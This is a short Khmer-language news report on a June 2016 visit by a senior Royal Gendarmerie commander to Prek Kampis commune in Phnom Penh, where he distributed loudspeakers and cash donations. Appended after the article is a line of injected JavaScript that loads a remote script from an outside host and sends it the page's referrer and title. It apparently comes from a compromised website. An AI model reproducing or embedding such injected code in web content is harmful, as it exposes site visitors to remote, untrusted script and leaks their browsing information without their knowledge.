ឯកឧត្តម ឧត្តមសេនីយ៍ឯក រ័ត្ន ស្រ៊ាង អញ្ជើញចុះសំណេះសំណាលជាមួយប្រជាពលរដ្ឋក្នុងសង្កាត់ព្រែកកំពិស
ភ្នំពេញ៖ នៅព្រឹកថ្ងៃទី០៤-០៦-២០១៦ ឯកឧត្តម ឧត្តមសេនីយ៍ឯក រ័ត្ន ស្រ៊ាង មេបញ្ជាការរងកងរាជអាវុធហត្ថលើផ្ទៃប្រទេស និងជាមេបញ្ជាការ កងរាជអាវុធហត្ថរាជធានីភ្នំពេញ បានឆ្លៀតឱកាសចុងសប្តាហ៍ ចុះជួបសំណេះសំណាលជាមួយថ្នាក់ដឹកនាំអាជ្ញាធរមូលដ្ឋាន សង្កាត់ព្រែកកំពិសទាំងមូល ក្នុងខណ្ឌដង្កោ រាជធានីភ្នំពេញ ដើម្បីបង្កើន ភាពស្និតស្នាល និងផ្លាស់ប្តូរព័ត៌មាន ស្តីពីការអនុវត្តគោលនយោបាយ ភូមិ-សង្កាត់មានសុវត្ថិភាព។
ក្នុងកម្មវិធីនោះ ក៏មានវត្តមាន លោក នុត ពុធដារ៉ា អភិបាលខណ្ឌដង្កោ លោកអភិបាលរងខណ្ឌ និងមន្ត្រីអាវុធហត្ថជាច្រើនរូប ចូលរួម ផងដែរ។ ក្រោយពេលចប់ការសំណេះសំណាល ឯកឧត្តម រ័ត្ន ស្រ៊ាង បានចែកឧបកណ៍បំពងសំឡេង ដែលមានមុខងារច្រើនយ៉ាងគឺ ចាក់ឌីស ចាក់មេម៉ូរី ស្តាប់វិទ្យុ បាញ់ប្លូធូស និងពិសេសសម្រាប់និយាយមេក្រួ ងាយស្រួលចល័ត សរុបចំនួន១២គ្រឿង សម្រាប់ប្រើ ជាប្រយោជន៍ ក្នុងការជួបជុំសំណេះសំណាលក្នុងកម្មវិធីផ្សេងៗ ក្នុងនោះចែកជូនដល់សាលាខណ្ឌចំនួន១, សាលាសង្កាត់ចំនួន១, ស្នាក់ការភូមិចំនួន៦, វិទ្យាល័យចំនួន១, អនុវិទ្យាល័យចំនួន១, និងវត្តចំនួន២ ដោយក្នុង១វត្តទទួលបាន ឧបករណ៍បំពងសំឡេង១ ថវិកា៥០ម៉ឺនរៀល និង យាយជី តាជី ចំណុះជើងវត្តទាំង២ ក៏ទទួលបានថវិកា ម្នាក់១ម៉ឺនរៀលផងដែរ។
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;